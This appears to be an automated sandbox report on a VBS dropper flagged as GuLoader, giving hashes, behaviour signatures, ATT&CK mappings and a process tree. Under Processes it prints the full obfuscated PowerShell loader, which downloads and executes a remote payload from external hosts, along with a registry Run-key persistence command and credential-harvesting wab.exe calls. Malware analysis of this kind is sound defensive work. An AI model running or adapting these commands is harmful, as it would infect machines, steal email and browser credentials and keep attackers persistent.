Overview

overview

10

Static

static

1

64c701bc7d...cd.vbs

windows7-x64

10

64c701bc7d...cd.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-07-2024 01:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    64c701bc7d32900bf11e8f5dd9bed584d350a949c467f5fd6643e8cd7f902fcd.vbs

  • Size

    26KB

  • MD5

    ed86258f8c9db682ae810896c67d498c

  • SHA1

    e182aef5ecacc6bec36e9bc2bb255436b9dae698

  • SHA256

    64c701bc7d32900bf11e8f5dd9bed584d350a949c467f5fd6643e8cd7f902fcd

  • SHA512

    b90e69ed8c473994472b813ef68c45d91e4c46485227f109d400a8b7d4ebfe425abc585387ed61f9e51fd00fd6cdca16f9bf4bf1800082d9cebc8d650429822a

  • SSDEEP

    384:PlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwCjnvhTT1EFw:9zSR022X/523S0e8xPPmVvJr08hpouGs

Score
10/10
guloadercollectiondownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\64c701bc7d32900bf11e8f5dd9bed584d350a949c467f5fd6643e8cd7f902fcd.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3280
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin';If (${host}.CurrentCulture) {$Cuculidae++;}Function Glycosemia205($Drfyldingernes){$Folkloric=$Drfyldingernes.Length-$Cuculidae;$Decalvant='SUBsTRI';$Decalvant+='ng';For( $Fritures=1;$Fritures -lt $Folkloric;$Fritures+=2){$Relinquishments+=$Drfyldingernes.$Decalvant.Invoke( $Fritures, $Cuculidae);}$Relinquishments;}function Eksistensminimas($Rettesnorene){ &($Prosadigtene) ($Rettesnorene);}$signallygtens=Glycosemia205 'AM.o z i l.lRa./ 5U. 0, b( Wsi.nEd o w s, ,NdT. 1C0M. 0U;, SW i n 6 4A;t .x 6 4G; Tr vK: 1 2G1 . 0n). AG,e cOk oS/ 2 0 1 0,0 1A0R1. ,F itrMerfSo,xO/ 1M2 1 .A0F ';$Millihg=Glycosemia205 ' UCs eor - A,gDe.nFt ';$Transceive2=Glycosemia205 'sh,t t pD: /S/N1 0 3 ..1F9E5 .U2 3N7S. 4.3,/ N y.e t .KqOxFdS> h tAt.pSsE:P/,/Tm,i l aDn aRcOe.sA.Cc,o,m / N,y.e t ..qAxEdv ';$Mellemliggende=Glycosemia205 ',>. ';$Prosadigtene=Glycosemia205 'DiAeSx ';$Distendedly='opbyggendes';$Tilbageholdelses = Glycosemia205 'ce.c,hMoU S%,aRp.pKd aRtDaS%s\ s.tBa,l lLm aUnP. FArBoN &C&K IeOcEhco St ';Eksistensminimas (Glycosemia205 'D$ g.lHoEbSaNlP:SP a.rua,l l e lReVd =.( cSmTd ./Uc $GT,i l,b aBg e.h o,lPd.e.l s.eFsS)H ');Eksistensminimas (Glycosemia205 'U$igIlSo bSaAl :USUe.kUsLtMeUnHa,a rBsCf,dSsFeelfs d.aIgZeunMsH=p$,TArUa.nAs,cUePi.v e.2 .Os,p.l,i,tI(H$UM e.lPlDePm.l.iBg.gFeVn d eT)I ');Eksistensminimas (Glycosemia205 ' [ N e.t,.oSAe.r v iRcEe.PDo iUn t MFa,n a,g eIr ]L:K: S e.c uFrfi t y PSrNoStCoScBo,l =s M[ NRe.tU..SSe,c u rTi t y,PSrDo tGoHcPoClrT,yBpAeF] :A:CT.lOs 1D2 ');$Transceive2=$Sekstenaarsfdselsdagens[0];$Lothar= (Glycosemia205 'A$,gfl o b aUl :,D i s eJnLtTe.r =VNNeRw - O.bRj.eBc tC S y,s t e,mI.AN.e tk. WTeIb,CFl.ile,n t');$Lothar+=$Paralleled[1];Eksistensminimas ($Lothar);Eksistensminimas (Glycosemia205 'S$DDRiCsDeTnGt.e rS. HPeRaNd eSrKs [C$,MLi.lAlPiKhGg ]D=P$ s,i g n aPlHl y.g.tte nMsP ');$Emigated=Glycosemia205 ' $ DFi,s,eVnLt eSrS.PDBoUwRnYl ofa,d F.i l e (N$FT,rAaSnTs cKe iNvFe 2S,P$TANl g,u.mAsF) ';$Algums=$Paralleled[0];Eksistensminimas (Glycosemia205 'A$ g l.oFbCa lG: BNuMfHf.ePrSe dG= ( TRe,sSt,- PDa t h R$HA,l g uSmTs,) ');while (!$Buffered) {Eksistensminimas (Glycosemia205 ' $BgClhoObiaCl :SA,n.g eSlMi.cLnAePsRsF= $AtKrSuDe ') ;Eksistensminimas $Emigated;Eksistensminimas (Glycosemia205 'BS tFa rEtO- S lOeAePpL f4P ');Eksistensminimas (Glycosemia205 'P$fg,l o b a lF:SBHuKfSf.eSrfesd,=W(UT eSs.t -CPEa t h $.AAl,gFuBm s )U ') ;Eksistensminimas (Glycosemia205 'S$LgNlAoPbMaSl :VO,k,sBeEh,aKl eRnls,=,$.g,l o b.acl : M iKd dTe lSv e jSeTn.+.+M%C$DSKe kOsSt.e nPaWaSrds fAd sHeUlPs.dHaVgFeFnfs..ncTopuhnNt. ') ;$Transceive2=$Sekstenaarsfdselsdagens[$Oksehalens];}$Sandhedsvidnet=334484;$Phytol=26427;Eksistensminimas (Glycosemia205 ' $ gNl o bNa lI:TK u.lOtDuMrPuNdAbCuMd d e tQs 1U5S6a C=T TGSe t -PC o nPtCeKn tB $.AOlSg,uCmKsC ');Eksistensminimas (Glycosemia205 ' $Ig l o bRa.lK:BsVw a.gT G=, [BSsy s tUeFm .SCbo nLvCe rNt ]D: : FSrAo mtBFa.s.eR6.4fS t rDiDnPg (A$,KRuMl t u r u.d b,u dAdJe t,s,1K5 6V) ');Eksistensminimas (Glycosemia205 ' $ g,l oSb aKl :.CFo rKrMo sSi b,l.e ,=P [ S.yFsBt,eSm..ETSe,xSth.KE n cJoFdji,n g ]H:J:VASS C.I,IS.,G,e tHSGt.r i nGg (b$ sRwPa,g,), ');Eksistensminimas (Glycosemia205 'E$TgUl oEb.aFl.:SEBhbrBlgiMc h,m,a,nS=B$ C oCrrrCoDs iTbDlTe.. sSuRb,s t r,iTnBgp(B$,S a,n.d,h e d.s v iFd.nSeHt ,B$ PSh y tSo,l,)O ');Eksistensminimas $Ehrlichman;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1212
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\stallman.Fro && echo t"
        3⤵
          PID:4804
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin';If (${host}.CurrentCulture) {$Cuculidae++;}Function Glycosemia205($Drfyldingernes){$Folkloric=$Drfyldingernes.Length-$Cuculidae;$Decalvant='SUBsTRI';$Decalvant+='ng';For( $Fritures=1;$Fritures -lt $Folkloric;$Fritures+=2){$Relinquishments+=$Drfyldingernes.$Decalvant.Invoke( $Fritures, $Cuculidae);}$Relinquishments;}function Eksistensminimas($Rettesnorene){ &($Prosadigtene) ($Rettesnorene);}$signallygtens=Glycosemia205 'AM.o z i l.lRa./ 5U. 0, b( Wsi.nEd o w s, ,NdT. 1C0M. 0U;, SW i n 6 4A;t .x 6 4G; Tr vK: 1 2G1 . 0n). AG,e cOk oS/ 2 0 1 0,0 1A0R1. ,F itrMerfSo,xO/ 1M2 1 .A0F ';$Millihg=Glycosemia205 ' UCs eor - A,gDe.nFt ';$Transceive2=Glycosemia205 'sh,t t pD: /S/N1 0 3 ..1F9E5 .U2 3N7S. 4.3,/ N y.e t .KqOxFdS> h tAt.pSsE:P/,/Tm,i l aDn aRcOe.sA.Cc,o,m / N,y.e t ..qAxEdv ';$Mellemliggende=Glycosemia205 ',>. ';$Prosadigtene=Glycosemia205 'DiAeSx ';$Distendedly='opbyggendes';$Tilbageholdelses = Glycosemia205 'ce.c,hMoU S%,aRp.pKd aRtDaS%s\ s.tBa,l lLm aUnP. FArBoN &C&K IeOcEhco St ';Eksistensminimas (Glycosemia205 'D$ g.lHoEbSaNlP:SP a.rua,l l e lReVd =.( cSmTd ./Uc $GT,i l,b aBg e.h o,lPd.e.l s.eFsS)H ');Eksistensminimas (Glycosemia205 'U$igIlSo bSaAl :USUe.kUsLtMeUnHa,a rBsCf,dSsFeelfs d.aIgZeunMsH=p$,TArUa.nAs,cUePi.v e.2 .Os,p.l,i,tI(H$UM e.lPlDePm.l.iBg.gFeVn d eT)I ');Eksistensminimas (Glycosemia205 ' [ N e.t,.oSAe.r v iRcEe.PDo iUn t MFa,n a,g eIr ]L:K: S e.c uFrfi t y PSrNoStCoScBo,l =s M[ NRe.tU..SSe,c u rTi t y,PSrDo tGoHcPoClrT,yBpAeF] :A:CT.lOs 1D2 ');$Transceive2=$Sekstenaarsfdselsdagens[0];$Lothar= (Glycosemia205 'A$,gfl o b aUl :,D i s eJnLtTe.r =VNNeRw - O.bRj.eBc tC S y,s t e,mI.AN.e tk. WTeIb,CFl.ile,n t');$Lothar+=$Paralleled[1];Eksistensminimas ($Lothar);Eksistensminimas (Glycosemia205 'S$DDRiCsDeTnGt.e rS. HPeRaNd eSrKs [C$,MLi.lAlPiKhGg ]D=P$ s,i g n aPlHl y.g.tte nMsP ');$Emigated=Glycosemia205 ' $ DFi,s,eVnLt eSrS.PDBoUwRnYl ofa,d F.i l e (N$FT,rAaSnTs cKe iNvFe 2S,P$TANl g,u.mAsF) ';$Algums=$Paralleled[0];Eksistensminimas (Glycosemia205 'A$ g l.oFbCa lG: BNuMfHf.ePrSe dG= ( TRe,sSt,- PDa t h R$HA,l g uSmTs,) ');while (!$Buffered) {Eksistensminimas (Glycosemia205 ' $BgClhoObiaCl :SA,n.g eSlMi.cLnAePsRsF= $AtKrSuDe ') ;Eksistensminimas $Emigated;Eksistensminimas (Glycosemia205 'BS tFa rEtO- S lOeAePpL f4P ');Eksistensminimas (Glycosemia205 'P$fg,l o b a lF:SBHuKfSf.eSrfesd,=W(UT eSs.t -CPEa t h $.AAl,gFuBm s )U ') ;Eksistensminimas (Glycosemia205 'S$LgNlAoPbMaSl :VO,k,sBeEh,aKl eRnls,=,$.g,l o b.acl : M iKd dTe lSv e jSeTn.+.+M%C$DSKe kOsSt.e nPaWaSrds fAd sHeUlPs.dHaVgFeFnfs..ncTopuhnNt. ') ;$Transceive2=$Sekstenaarsfdselsdagens[$Oksehalens];}$Sandhedsvidnet=334484;$Phytol=26427;Eksistensminimas (Glycosemia205 ' $ gNl o bNa lI:TK u.lOtDuMrPuNdAbCuMd d e tQs 1U5S6a C=T TGSe t -PC o nPtCeKn tB $.AOlSg,uCmKsC ');Eksistensminimas (Glycosemia205 ' $Ig l o bRa.lK:BsVw a.gT G=, [BSsy s tUeFm .SCbo nLvCe rNt ]D: : FSrAo mtBFa.s.eR6.4fS t rDiDnPg (A$,KRuMl t u r u.d b,u dAdJe t,s,1K5 6V) ');Eksistensminimas (Glycosemia205 ' $ g,l oSb aKl :.CFo rKrMo sSi b,l.e ,=P [ S.yFsBt,eSm..ETSe,xSth.KE n cJoFdji,n g ]H:J:VASS C.I,IS.,G,e tHSGt.r i nGg (b$ sRwPa,g,), ');Eksistensminimas (Glycosemia205 'E$TgUl oEb.aFl.:SEBhbrBlgiMc h,m,a,nS=B$ C oCrrrCoDs iTbDlTe.. sSuRb,s t r,iTnBgp(B$,S a,n.d,h e d.s v iFd.nSeHt ,B$ PSh y tSo,l,)O ');Eksistensminimas $Ehrlichman;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4608
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\stallman.Fro && echo t"
            4⤵
              PID:5100
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3032
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chooseable" /t REG_EXPAND_SZ /d "%valleculate% -w 1 $Flkkedes=(Get-ItemProperty -Path 'HKCU:\Optagningsmaskiners\').Kesslerman;%valleculate% ($Flkkedes)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4628
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chooseable" /t REG_EXPAND_SZ /d "%valleculate% -w 1 $Flkkedes=(Get-ItemProperty -Path 'HKCU:\Optagningsmaskiners\').Kesslerman;%valleculate% ($Flkkedes)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:4476
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\muwagbfkqxroarhmwimpqgqlzumm"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4352
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\owjshuqdefjtcxdynsyqbkkchawvcgu"
                5⤵
                • Accesses Microsoft Outlook accounts
                PID:3700
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zqpd"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1660
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4136,i,2029050989380753659,15333598055019363793,262144 --variations-seed-version --mojo-platform-channel-handle=4484 /prefetch:8
        1⤵
          PID:3380

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Defense Evasion

        Modify Registry

        2
        T1112

        Credential Access

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Email Collection

        1
        T1114

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hgtvque.d35.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\muwagbfkqxroarhmwimpqgqlzumm
          Filesize

          4KB

          MD5

          1f438b4289b7bacbfd5f1c8e7fc2f75f

          SHA1

          dcda2f2c41416c5515889519b668feca49fd5c71

          SHA256

          dda03a1caa93b0ff4d9204642c71cb6de58ede08d1ebac4e7fd194c94ec06d7c

          SHA512

          c138ad05e8330a836b700d65beb2a9492b4d97e076c39aa4ed886653c00c45b650a812fe82ec620ad6e698f4f47362154d763ca0c68c256dfeb7c169d2e35515

          Download Submit
        • C:\Users\Admin\AppData\Roaming\stallman.Fro
          Filesize

          469KB

          MD5

          aba02c6ac493c569a13fe65cd959509b

          SHA1

          bad9b1ca9d756e3132c0f6a31d91ff5292261463

          SHA256

          e358c9e0c4fc9d907f60c86fab74df3ebc37ab8e2051d989b76a0ec2cf512461

          SHA512

          a8c55d08fbc07f1a4363b2d546b495ed19520a1069d84c8abf47f296a2e30c2494d477ef9e30248bf70519cf738caf4a6305c027246c683dd38e586786976567

          Download Submit
        • memory/1212-5-0x000001CD67590000-0x000001CD675B2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/1212-15-0x00007FFCB7960000-0x00007FFCB8421000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1212-16-0x00007FFCB7960000-0x00007FFCB8421000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1212-4-0x00007FFCB7963000-0x00007FFCB7965000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1212-55-0x00007FFCB7960000-0x00007FFCB8421000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1212-44-0x00007FFCB7963000-0x00007FFCB7965000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1212-43-0x00007FFCB7960000-0x00007FFCB8421000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1660-68-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/1660-69-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/1660-64-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/3032-52-0x0000000002260000-0x0000000004BA7000-memory.dmp
          Filesize

          41.3MB

          Download
        • memory/3032-83-0x0000000020A90000-0x0000000020AA9000-memory.dmp
          Filesize

          100KB

          Download
        • memory/3032-84-0x0000000020A90000-0x0000000020AA9000-memory.dmp
          Filesize

          100KB

          Download
        • memory/3032-80-0x0000000020A90000-0x0000000020AA9000-memory.dmp
          Filesize

          100KB

          Download
        • memory/3700-61-0x0000000000400000-0x0000000000462000-memory.dmp
          Filesize

          392KB

          Download
        • memory/3700-63-0x0000000000400000-0x0000000000462000-memory.dmp
          Filesize

          392KB

          Download
        • memory/3700-59-0x0000000000400000-0x0000000000462000-memory.dmp
          Filesize

          392KB

          Download
        • memory/4352-62-0x0000000000400000-0x0000000000478000-memory.dmp
          Filesize

          480KB

          Download
        • memory/4352-60-0x0000000000400000-0x0000000000478000-memory.dmp
          Filesize

          480KB

          Download
        • memory/4352-58-0x0000000000400000-0x0000000000478000-memory.dmp
          Filesize

          480KB

          Download
        • memory/4608-34-0x0000000006820000-0x000000000683E000-memory.dmp
          Filesize

          120KB

          Download
        • memory/4608-22-0x0000000006150000-0x00000000061B6000-memory.dmp
          Filesize

          408KB

          Download
        • memory/4608-29-0x0000000006230000-0x0000000006584000-memory.dmp
          Filesize

          3.3MB

          Download
        • memory/4608-40-0x0000000008AB0000-0x0000000009054000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/4608-20-0x00000000059B0000-0x0000000005FD8000-memory.dmp
          Filesize

          6.2MB

          Download
        • memory/4608-39-0x0000000007A60000-0x0000000007A82000-memory.dmp
          Filesize

          136KB

          Download
        • memory/4608-23-0x00000000061C0000-0x0000000006226000-memory.dmp
          Filesize

          408KB

          Download
        • memory/4608-42-0x0000000009060000-0x000000000B9A7000-memory.dmp
          Filesize

          41.3MB

          Download
        • memory/4608-38-0x0000000007AD0000-0x0000000007B66000-memory.dmp
          Filesize

          600KB

          Download
        • memory/4608-21-0x0000000005860000-0x0000000005882000-memory.dmp
          Filesize

          136KB

          Download
        • memory/4608-19-0x0000000005230000-0x0000000005266000-memory.dmp
          Filesize

          216KB

          Download
        • memory/4608-37-0x0000000006D60000-0x0000000006D7A000-memory.dmp
          Filesize

          104KB

          Download
        • memory/4608-36-0x0000000007E80000-0x00000000084FA000-memory.dmp
          Filesize

          6.5MB

          Download
        • memory/4608-35-0x00000000068A0000-0x00000000068EC000-memory.dmp
          Filesize

          304KB

          Download